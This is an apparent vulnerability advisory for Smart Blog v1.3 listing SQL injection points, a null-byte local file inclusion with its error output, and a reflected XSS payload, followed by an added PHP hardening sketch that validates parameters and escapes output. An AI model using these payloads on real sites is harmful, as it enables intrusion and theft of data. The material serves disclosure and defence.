=================================================================
| # Title : Smart Blog v 1.3 Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Actionnée par smartblog
| # Tested on: Windows 8.1 French V.(Pro)
| # Bug : Multi
| # Download : http://www.p30vel.ir
================================================================
SQL injection :
http://127.0.0.1/tst/index.php?jour=22&mois=10&an=2014 (inject here)
http://127.0.0.1/tst/index.php?idt=1 (inject here)
File inclusion :
The URL-encoded GET input page was set to 1some_inexistent_file_with_long_name%00.html
Error message found:
<b>Warning</b>: fopen(template/default/html/tpl_1some_inexistent_file_with_long_name%00.html)
[<a href='function.fopen'>function.fopen</a>]:
failed to open stream: No such file or directory in <b>C:\AppServ\www\tst\lib\template.php</b> on line <b>4</b>
/tst/?page=1some_inexistent_file_with_long_name%2500.html
XSS :
/tst/?an=2014%22%20onmouseover%3dprompt(900632)%20bad%3d%22&mois=11
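Mitigation sketch for the three inputs above, as an added example that is not Smart Blog's code: the helper names (int_param, template_path, h) are hypothetical, the template directory is the one shown in the fopen() warning, and the sample requests are constructed.

```php
<?php
// Added example: hypothetical hardening helpers, not Smart Blog's own code.
declare(strict_types=1);

// Template directory as shown in the fopen() warning of the advisory.
const TPL_DIR = 'template/default/html';

// Return an integer request parameter within [min, max], or null if invalid.
function int_param(array $src, string $name, int $min, int $max): ?int
{
    if (!isset($src[$name]) || !is_string($src[$name])) {
        return null;
    }
    $v = filter_var($src[$name], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

// Map the page parameter to a template path. Only [a-z0-9_-] is accepted,
// which excludes NUL bytes, dots, slashes and percent signs.
function template_path(string $page): ?string
{
    if (preg_match('/\A[a-z0-9_-]{1,32}\z/', $page) !== 1) {
        return null;
    }
    $path = TPL_DIR . '/tpl_' . $page . '.html';
    return is_file($path) ? $path : null;
}

// Escape a value before echoing it into HTML text or a quoted attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample requests using the parameter names from the advisory.
$samples = [
    ['an' => '2014', 'idt' => '1', 'page' => 'home'],
    ['an' => '2014" onmouseover=x bad="', 'idt' => "1'", 'page' => "1x\0.html"],
];
foreach ($samples as $q) {
    $an  = int_param($q, 'an', 1970, 2100);      // jour and mois are checked the same way
    $idt = int_param($q, 'idt', 1, PHP_INT_MAX);
    printf("an=%s idt=%s tpl=%s echo=\"%s\"\n", var_export($an, true),
        var_export($idt, true), var_export(template_path($q['page']), true), h($q['an']));
}
```

Validated integers should still reach the database through bound parameters (for example PDO prepared statements), not string concatenation. Turning off display_errors in production keeps warnings such as the fopen() message above from disclosing the install path.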
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * 9aylas * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================